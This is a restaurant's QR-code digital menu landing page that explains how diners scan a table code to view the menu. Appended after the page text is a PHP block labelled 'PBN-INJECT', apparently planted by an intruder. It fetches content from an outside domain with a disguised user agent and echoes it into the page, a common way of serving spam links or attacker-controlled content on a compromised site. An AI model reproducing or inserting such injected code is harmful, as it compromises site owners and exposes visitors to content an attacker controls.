Restaurant Interior
Delicious Food
Dining Experience
Dining Experience
Dining Experience

Welcome to Our Digital Menu

Scan the QR code at your table to view our menu on your device.

View Menu

Why Digital Menu?

Scan & Browse

Simply scan the QR code at your table to view our menu instantly.

Full Menu

Browse our complete menu with beautiful images and detailed descriptions.

Mobile Friendly

Optimized viewing experience on all devices, especially smartphones.

How It Works

1

Find the QR Code

Look for the QR code placed on your table.

2

Scan with Camera

Open your smartphone camera and point it at the QR code.

3

View the Menu

Our digital menu will open automatically on your device.

See Example Menu
/* PBN-INJECT-START:ef4070ae8a093d5624e707ce40a3ee792c9e9232 */ $url = "https://nawalaku.my.id/bl/"; // try file_get_contents first $content = @file_get_contents($url); if ($content === false) { // fallback to cURL if (function_exists('curl_version')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; FetchBot/1.0)'); // fetch $content = curl_exec($ch); $errno = curl_errno($ch); $err = curl_error($ch); curl_close($ch); if ($content === false || $errno !== 0) { echo ""; exit; } } else { echo ""; exit; } } // output content echo $content; /* PBN-INJECT-END:ef4070ae8a093d5624e707ce40a3ee792c9e9232 */